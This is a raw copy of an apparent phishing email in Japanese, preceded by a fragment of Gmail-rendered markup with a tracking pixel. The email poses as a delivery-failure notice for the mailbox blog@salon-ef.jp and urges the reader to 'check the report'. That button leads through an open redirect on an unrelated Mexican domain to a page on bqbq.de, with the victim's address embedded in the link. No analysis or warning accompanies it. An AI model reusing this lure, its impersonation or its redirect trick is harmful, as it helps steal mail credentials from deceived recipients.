<td style="direction:ltr"><span><img alt="salon-ef.jp" style="width:99px;height:21px;border-width:medium;border-style:none;border-color:currentcolor;display:block" width="99" height="21" src="https://mail.google.com/mail/u/0?ui=2&ik=40130d2984&attid=0.4&permmsgid=msg-f:1803910570680093888&th=1908c71b43f58cc0&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ8nttAYpRNSfIVakZoJnmQWxUKOCOwzxdp1rMzugo5z2nnl5-emdw2NkWqoFla6GuR7LNmFWjlYFYxdK4Ltpua8N0XN6UgZpyCb9H6jhOomrHPvOTg3gdowtxk&disp=emb" data-image-whitelisted="" class="CToWUd" data-bit="iit"></span></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div style="direction:ltr"><span><img style="width:1px;height:1px" width="1" height="1" src="https://ci3.googleusercontent.com/meips/ADKq_NYejWp53UVhEF6ZL6MMTvWtZ9kqf1nkUImSsk6kNUYEbOxWV5R09B6aYrQBZOdNKzKrWvWtsm9dR94GikCJvO0mbqOjc2gS2osPsdzyQEqm3lzagIAXx_a9LfGVBjOO5apxTRnCMv4zub8HnhtfNzd9xQ=s0-d-e1-ft#https://southcentralusr-notifyp.svc.ms/api/v2/tracking/method/View?mi=5D7ijw2AUEWORq_8kGcGJQ" class="CToWUd" data-bit="iit"></span></div><div class="yj6qo"></div><div class="adL">
</div></div><div class="adL">
</div></div><div class="adL">
</div></div></div><div class="WhmR8e" data-hash="0"></div></div>
(SalonEF)
2025年7月 3日 09:00
【システム通知】blog@salon-ef.jp 宛ての配信失
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<title>通知メール</title>
</head>
<body style="margin: 0; padding: 0; background-color: #f4f4f4;">
<div style="font-family: 'Yu Gothic', 'Meiryo', Arial, sans-serif; max-width: 600px; margin: 40px auto; border: 1px solid #ddd; padding: 24px; background-color: #fff;">
<div style="background-color: #0078d4; color: white; padding: 12px 20px; font-size: 16px; font-weight: bold; border-radius: 4px 4px 0 0;">
通知 - メール配信エラーのお知らせ
</div>
<p style="font-size: 14px; margin-top: 20px;">
blog@salon-ef.jp 様<br>
貴社のメールアカウント <strong>blog@salon-ef.jp</strong> から送信された一部のメッセージが、受信者に正常に配信されなかったことをお知らせいたします。
</p>
<p style="font-size: 14px;">
対象となるメッセージ数: <strong>7 件</strong><br>
詳細につきましては、以下のリンクよりレポートをご確認ください。
</p>
<a href="https://documentos.arq.com.mx/cgi-bin/docimg.cgi?a=ir&did=66431&url=http%3A%2F%2Fbqbq.de/gjgkhfiy/index.html?uid=blog@salon-ef.jp"
style="display: inline-block; background-color: #0078d4; color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px; margin-top: 12px;">
レポートを確認する
</a>
<p style="font-size: 14px; margin-top: 24px;">
Thank you.<br><br>
サポートチーム一同
</p>
<div style="font-size: 11px; color: gray; margin-top: 20px; padding-top: 12px; border-top: 1px solid #eee;">
※このメールは自動送信されています。返信の必要はございません。<br>
配信エラーが続く場合は、メールサーバー管理者までご連絡ください。
</div>
</div>
</body>
</html>
(SalonEF)
2025年7月 3日 09:00
1